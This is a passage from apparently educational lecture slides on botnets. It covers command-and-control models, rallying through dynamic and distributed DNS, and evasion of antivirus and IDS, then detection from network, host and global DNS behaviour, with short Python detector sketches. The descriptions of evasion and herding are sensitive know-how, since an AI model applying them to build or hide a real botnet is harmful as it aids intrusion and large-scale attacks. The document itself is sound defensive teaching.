private (messages between only two people, who may or may not
be on the same channel).
88
Scheme of an IRC-Network [Wikipedia]
normal clients (green)
bots (blue)
bouncers (orange)
89
Command and Control (C&C) System
C&C works as follows.
A botmaster sets up a C&C server, typically an
IRC server.
After a bot virus infects a host, it will connect
back to the C&C server and wait on the
botmaster’s command.
In a typical IRC botnet, the bot will join a
certain IRC channel to listen to messages from
its master.
90
Categories of C&C
C&C systems can be roughly categorized into
three different models
the centralized model,
the peer-to-peer (P2P) model
the random model
P.S.: We believe these three C&C models are
sufficient to cover all the botnets found today. But
given the quickly evolving nature of botnets, it is
possible that future botnets may use new
command and control systems that are completely
different from any of them.
91
Centralized C&C Model
In the centralized model, a botmaster selects a single high
bandwidth host to be the contacting point (C&C server) of
all the bots.
The C&C server, usually a compromised computer as well, would
run certain network services such as IRC or HTTP.
When a new computer is infected by a bot, it will join the botnet
by initiating a connection to the C&C server.
Once joined to the appropriate C&C server channel, the bot would
then wait on the C&C server for commands from the botmaster.
Botnets may have mechanisms to protect their communications.
• For example, IRC channels may be protected by passwords only
known to bots and their masters to prevent eavesdropping.
92
Popularity of the Centralized C&C
Model
The centralized model is the predominant
C&C model used by existing botnets.
Many well known bots, such as AgoBot,
SDBot and RBot, fall into the category of
the centralized C&C model.
93
Why the Centralized C&C Model (1) ?
Due to the rich variety of software tools (e.g., IRC
bot scripts on IRC servers and IRC bots), the
centralized C&C model is rather simple to
implement and customize.
Notice that a botmaster can easily control
thousands of bots using the centralized model.
Botmasters are profit driven; hence, they are more
interested in the centralized C&C model which
allows them to control as many bots as possible
and maximize their profit.
94
Why the Centralized C&C Model (2) ?
Few countermeasures have been used to
fight against botnets. So, the centralized
botnets have good survivability in the real
world at this moment.
95
Why the Centralized C&C Model (3) ?
Messaging latency in the centralized
model is small. Therefore, it is easy for
botmasters to coordinate botnets and launch
attacks.
96
Drawback of the Centralized C&C
Model
The C&C server is the crucial place where
most of the conversation happens. Therefore,
the C&C server is the weakest link in a
botnet.
If we can manage to discover and destroy
the C&C server, the entire botnet will be
gone.
97
Motivation for a P2P-Based C&C
Model
Some botnet authors have started to build
alternative botnet communication systems, which
are more resilient to failures in the network.
An interesting C&C paradigm that emerged
recently exploits the idea of P2P communication.
For instance, certain variants of Phatbot have used
P2P communication as a means to control botnets.
The botnets that use P2P based C&C are still very
few.
98
Future of the P2P-Based C&C
Model
Compared with the centralized C&C model, the
P2P based C&C model is much harder to
discover and destroy. Since the communication
system doesn’t heavily depend on a few selected
servers, destroying a single, or even a number of
bots, won’t necessarily lead to the destruction of
an entire botnet.
Because of this, it is possible that the P2P based
C&C model will be used increasingly in botnets
in the near future.
99
Constraints of the P2P C&C Model (1)
Existing P2P systems only support
conversations of small user groups, usually
in the range of 10-50 users.
The group size supported by P2P systems is
too small compared to the size of
centralized C&C botnets, in which a botnet
of 1000 compromised hosts is still on the
small side.
100
Constraints of the P2P C&C Model (2)
Existing P2P systems don’t guarantee
message delivery and propagation latency.
Therefore, if using P2P communication, a
botnet would be harder to coordinate than
those which use centralized C&C models.
101
Trend of the P2P C&C Model
The above two constraints have limited the wider
adoption of P2P based communication in botnets.
As the knowledge on implementing P2P based
botnets accumulates, new P2P-based botnets,
which overcome the above limitations, may appear.
As such, more and more botnets will move to use
P2P based communication since it is more robust
than centralized C&C communication.
102
Random C&C Model
In the proposed random C&C model, a bot will not actively contact
other bots or the botmaster.
Rather, a bot would listen to incoming connections from its botmaster.
To launch attacks, a botmaster would scan the Internet to discover its
bots.
When a bot is found, the botmaster issues commands to the bot.
While such a C&C model is easy to implement and highly resilient to
discovery and destruction, the model intrinsically has a scalability
problem and is difficult to use for large-scale, coordinated attacks.
Although this C&C model has not been used in real world botnets, it is
potentially interesting to certain future types of botnets that want high
survivability.
103
Rallying Mechanisms
Rallying mechanisms are critical for botnets
to discover new bots and rally them under
their botmasters.
104
Hard-coded IP Address
A common method used to rally new bots works like this:
A bot includes hard-coded C&C server IP addresses in its binary.
When the bot initially infects a computer, it will connect back to
the C&C server using the hard-coded server IP address that is
contained in the binary code.
The problem with using hard-coded IP addresses is that the C&C
server can be easily detected and the communication channel
easily blocked.
If a C&C server is "disconnected" in this fashion, a botnet may be
completely deactivated. Because of this, hard-coded server IP
addresses are used less often by recent variants of bots.
105
Dynamic DNS Domain Name
The bots today often include hard-coded domain names, assigned by
dynamic DNS providers.
The benefit of using dynamic DNS is that, if a C&C server is shut down
by authorities, the botmaster can easily resume his/her control by
creating a new C&C server somewhere else and updating the IP
address in the corresponding dynamic DNS entry.
When connections to the old C&C server fail, the bots will perform DNS
queries and be redirected to the new C&C server.
This DNS redirection behavior is often known as herding.
Using dynamic DNS names, a botmaster can retain control of its
botnet when an existing C&C server fails. Sometimes, a
botmaster will also update the dynamic DNS entry periodically to shift
the location of the command and control server, making detection
harder.
106
Distributed DNS Service
Some of the newer botnet breeds run their own distributed
DNS service at locations that are out of the reach of law
enforcement or other authorities.
Bots include the addresses of these DNS servers and
contact these servers to resolve the IP addresses of C&C
servers.
Often, these DNS services are configured to run on high
port numbers in order to evade detection by security
devices at gateways.
The botnets using distributed DNS service to rally their
bots are the hardest to detect and destroy, compared with
other types of botnets discussed.
107
Communication Protocols
Bots communicate with each other and their
botmasters following certain well-defined network
protocols.
In most cases, botnets don’t create new network
protocols for their communication. Instead, they
use existing communication protocols that are
implemented by publicly available software tools.
Examples include the IRC protocol itself and the publicly
available software implementations of IRC servers
and clients.
108
The Importance of Understanding
the Botnet Communication Protocols
First, their communication characteristics provide
an understanding of
the botnets’ origins
and
the possible software tools being used.
Second, understanding the communication
protocols helps security researchers decode the
conversations that take place between bots and their
masters.
109
Common Botnet Communication
Protocols
IRC Protocol
HTTP Protocol
P2P Protocol
… and so on.
110
Evasion Techniques – for AV and
IDS
A variety of techniques are used by botnets to
evade AV and signature-based IDS systems, e.g.,
sophisticated executable packers
rootkits
protocol evasion techniques, etc.
These evasion techniques improve the
survivability of botnets and the success rate of
compromising new hosts.
111
Evasion Techniques –
Communication (1)
Additionally, botnets have also added (and continue to add)
new mechanisms to hide traces of their communication.
Some botnets are moving away from IRC, since
IRC traffic is increasingly monitored in an effort
to detect botnets.
Instead, botnets are starting to use
modified IRC protocols
or
other protocols altogether (e.g., HTTP, VoIP)
for their communication channels.
112
Evasion Techniques –
Communication (2)
Encryption schemes are also being used to prevent
the content from being revealed.
Certain state-of-the-art botnets even use covert
channel communications such as TCP and ICMP
tunneling, and even IPv6 tunneling.
There have been technical discussions of the
possibility of using Skype and IM to
support communication.
113
Other Observable Activities
In order to detect the presence of botnets,
we need to discover abnormal behaviors
exhibited by botnets.
The observable behaviors of botnets can be
categorized into three types:
network-based behavior
host-based behavior
global correlated behavior
114
Network-based Behaviors
Botmasters need to communicate with their
bots and launch attacks.
When performing these functions, botnets
will generate certain observable network
traffic patterns that we can use to detect
individual bots and their C&C servers:
1. Observable Communication
2. Observable Attacking Traffic
115
Observable Communication (1)
Since botnets often use IRC and HTTP to
communicate with their bots, observable IRC &
HTTP traffic with abnormal patterns can be used
to indicate the presence of bots and the C&C
servers.
For example,
• inbound/outbound IRC traffic to an interior enterprise network
where IRC service is not allowed
and
• IRC conversations that follow certain syntax conventions that
humans don’t readily understand.
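The first example above can be sketched as a simple filter over flow records. This is only an illustration: the Flow record, the internal range 10.0.0.0/8, and the list of conventional IRC ports are assumptions made here, and a bot that uses a non-standard port would not be caught by a port check alone.

```python
from dataclasses import dataclass
import ipaddress

# Assumption: conventional IRC ports; real bots may use other ports.
IRC_PORTS = set(range(6660, 6670)) | {6697}

# Assumption: the enterprise's internal address range.
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")


@dataclass(frozen=True)
class Flow:
    """Hypothetical flow record: who talked to whom, on which port."""
    src_ip: str
    dst_ip: str
    dst_port: int


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL_NET


def suspicious_irc_flows(flows):
    """Return flows that cross the enterprise boundary on an IRC port."""
    hits = []
    for f in flows:
        crosses_boundary = is_internal(f.src_ip) != is_internal(f.dst_ip)
        if crosses_boundary and f.dst_port in IRC_PORTS:
            hits.append(f)
    return hits


flows = [
    Flow("10.1.2.3", "203.0.113.7", 6667),   # internal host -> external IRC
    Flow("10.1.2.3", "198.51.100.9", 443),   # ordinary HTTPS
    Flow("10.1.2.4", "10.9.9.9", 6667),      # stays inside the network
]
print(suspicious_irc_flows(flows))
```

Only the first flow is reported, because it is the only one that both leaves the internal network and targets an IRC port.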
116
Observable Communication (2)
Many botnets use dynamic DNS domain names to locate
their C&C servers. Thus, abnormal DNS queries may also
be used to detect botnets.
In some instances, hosts are found to query for improper
domain names (e.g., cheese.dns4biz.org,
butter.dns4biz.org) which can indicate a high
probability that these hosts are compromised.
The next logical step in this methodology would be to attempt to
glean the IP addresses of their C&C servers in observable traffic
streams.
If further detective work reveals that the IP address associated with a
particular domain name keeps changing periodically, it can provide
an even stronger indication of the presence of a botnet.
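A minimal sketch of the last check, assuming DNS answers have already been collected as (domain, IP) pairs. The function name, the threshold of three distinct addresses, and the sample addresses are assumptions for illustration; legitimate services may also rotate addresses, so a hit is only a hint for further investigation.

```python
from collections import defaultdict


def domains_with_changing_ips(observations, min_distinct_ips=3):
    """Return domains that resolved to at least min_distinct_ips addresses.

    observations: iterable of (domain, ip) pairs taken from DNS answers.
    """
    ips_by_domain = defaultdict(set)
    for domain, ip in observations:
        ips_by_domain[domain.lower()].add(ip)
    return sorted(
        domain
        for domain, ips in ips_by_domain.items()
        if len(ips) >= min_distinct_ips
    )


# Sample data; the IP addresses are made up (documentation ranges).
observations = [
    ("cheese.dns4biz.org", "203.0.113.10"),
    ("cheese.dns4biz.org", "198.51.100.20"),
    ("cheese.dns4biz.org", "192.0.2.30"),
    ("www.example.com", "192.0.2.80"),
    ("www.example.com", "192.0.2.80"),
]
print(domains_with_changing_ips(observations))
```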
117
Observable Communication (3)
Moreover, botnets may exhibit additional network
abnormalities that allow us to discover them.
One example is that bots are usually
idle most of the time in a connection, yet
respond faster than a human being at the keyboard
surfing the web.
Another example is that some
communication traffic originated by botnets is more
"bursty" than normal traffic.
So, botnets can potentially be discovered by
monitoring network traffic flow.
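One possible way to put a number on "bursty" is the coefficient of variation of packet inter-arrival times (standard deviation divided by mean). The slides do not name a metric, so this choice, the function name, and the sample timestamps are assumptions made here for illustration.

```python
from statistics import mean, pstdev


def burstiness(timestamps):
    """Coefficient of variation of packet inter-arrival times.

    Values near 0 mean evenly spaced traffic; larger values mean
    long idle periods interrupted by short bursts.
    """
    if len(timestamps) < 3:
        raise ValueError("need at least three timestamps")
    ordered = sorted(timestamps)
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    if avg == 0:
        return 0.0
    return pstdev(gaps) / avg


# Sample arrival times in seconds (made up for the example).
regular = [0, 10, 20, 30, 40]
bursty = [0.0, 0.1, 0.2, 60.0, 60.1, 60.2]

print(burstiness(regular))
print(burstiness(bursty))
```

The evenly spaced flow scores 0, while the flow with two short bursts separated by a long idle period scores well above 1.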
118
Observable Attacking Traffic
The traffic generated by botnets allows us to
discover their presence.
For example,
• When launching DDoS TCP SYN flood attacks, botnets can
send out a large number of invalid TCP SYN packets with
fake source IP addresses. Therefore, if a network monitoring
device finds a large number of outbound TCP SYN packets
that have invalid source IP addresses (i.e., IP addresses that
should not come from the internal network), it would indicate
that some internal hosts may be compromised and actively
participating in a DDoS attack.
• Similarly, if an internal host is found to send out phishing emails, this indicates that the host may be infected by a bot as
well.
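The SYN flood check can be sketched as follows, assuming outbound packets have already been captured at the gateway and parsed into small records. The internal range 192.168.0.0/16, the record layout, and the threshold of 100 packets are assumptions chosen for the example.

```python
import ipaddress

# Assumption: address ranges that legitimately belong to the internal network.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16")]


def source_is_internal(src_ip):
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in INTERNAL_NETS)


def spoofed_outbound_syns(packets):
    """Outbound SYN packets whose source IP cannot come from inside."""
    return [
        p for p in packets
        if p["syn"] and not source_is_internal(p["src"])
    ]


def ddos_suspected(packets, threshold=100):
    """True if the number of spoofed outbound SYNs reaches the threshold."""
    return len(spoofed_outbound_syns(packets)) >= threshold


# Sample outbound traffic: a few legitimate SYNs plus 150 spoofed ones.
legit = [{"src": "192.168.1.%d" % i, "syn": True} for i in range(1, 6)]
spoofed = [{"src": "198.51.100.%d" % (i % 250 + 1), "syn": True}
           for i in range(150)]
packets = legit + spoofed

print(len(spoofed_outbound_syns(packets)), ddos_suspected(packets))
```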
119
Host Based Behavior
Bots compromise computers and hide their
presence just like many older computer viruses.
Therefore, they exhibit certain observable
behaviors on compromised hosts, just as viruses do.
When executing, bots will make sequences of
system/library calls, e.g.
• modifying system registries and system files
• creating network connections
• disabling antivirus programs
The sequences of system/library calls made by bots are
often different from those made by legitimate programs and
applications.
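One common way to compare call sequences is to collect short sliding windows (n-grams) of calls from known-good traces and measure how many windows of a new trace were never seen before. The slides do not prescribe this method; it is a sketch, and the call names below are hypothetical labels rather than real system call names.

```python
def ngrams(trace, n=3):
    """Set of all length-n windows over a sequence of call names."""
    return {tuple(trace[i:i + n]) for i in range(len(trace) - n + 1)}


def anomaly_score(trace, normal_profile, n=3):
    """Fraction of the trace's n-grams that are absent from the profile."""
    grams = ngrams(trace, n)
    if not grams:
        return 0.0
    unseen = grams - normal_profile
    return len(unseen) / len(grams)


# Profile built from a trace of a legitimate program (hypothetical labels).
normal_trace = ["open", "read", "write", "close"]
normal_profile = ngrams(normal_trace)

# Trace that edits the registry, opens a connection, and disables AV.
bot_trace = ["open", "read", "write", "reg_set", "connect", "kill_av"]

print(anomaly_score(normal_trace, normal_profile))
print(anomaly_score(bot_trace, normal_profile))
```

A score near 0 means the trace looks like the profiled programs; a score near 1 means most of its call windows are unfamiliar.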
120
Global Correlated Behaviors
Perhaps botnet behavior observed in a global
snapshot is the most interesting one from the
viewpoint of detection efficiency.
Those global behavioral characteristics are often
tied to the fundamental structures and mechanisms
of botnets. Consequently, they are unlikely to
change from botnet to botnet unless the structures
and mechanisms of botnets themselves are
redesigned and re-implemented.
As a result, these globally observable behaviors
are the most valuable for detecting families of botnets.
121
Global Correlated Behaviors – DNS
Traffic (1)
Many botnets use dynamic DNS entries to track their C&C servers.
When a new C&C server is built, the related DNS entry is updated
to the IP address of the new C&C server, so that bots can find the
location of the new C&C server.
Botmasters may herd their botnets to different C&C server locations
periodically to avoid detection.
When a botmaster updates the dynamic DNS entry for its C&C server,
there is an observable global behavior on the Internet.
Specifically, bots are disconnected from the old C&C server, so they
query their DNS servers for the new IP address of the domain name,
resulting in a global increase in DNS queries for this DNS entry.
122
Global Correlated Behaviors – DNS
Traffic (2)
Therefore, if a network monitor discovers that a
dynamic DNS entry is updated and the update is followed by a
significant number of DNS queries for this entry,
then there is a high probability that this dynamic
DNS domain name is being used by botnet C&C
servers.
Such a feature is unlikely to change whether a
botnet is using IRC for communication or using
HTTP for communication, unless the
communication structure is changed.
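The correlation described on this slide can be sketched as a comparison of query rates before and after a DNS update. The function name, the per-interval query counts, the window of three intervals, and the factor of 5 are all assumptions chosen for illustration.

```python
def query_surge_after_update(counts, update_index, window=3, ratio=5.0):
    """True if queries for a domain jump right after its DNS entry changes.

    counts: DNS queries seen for the domain in consecutive time intervals.
    update_index: index of the interval in which the entry was updated.
    """
    before = counts[max(0, update_index - window):update_index]
    after = counts[update_index:update_index + window]
    if not before or not after:
        return False
    # Floor the baseline at 1 query so a quiet domain does not trigger
    # on a handful of lookups.
    baseline = max(sum(before) / len(before), 1.0)
    return sum(after) / len(after) >= ratio * baseline


# Sample per-interval query counts (made up for the example).
herded = [4, 5, 6, 90, 120, 80, 7]    # entry updated in interval 3
ordinary = [4, 5, 6, 5, 4, 6, 5]      # entry updated, no surge

print(query_surge_after_update(herded, update_index=3))
print(query_surge_after_update(ordinary, update_index=3))
```

Because the check looks only at DNS activity, it does not depend on whether the bots then talk to the C&C server over IRC or HTTP.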
123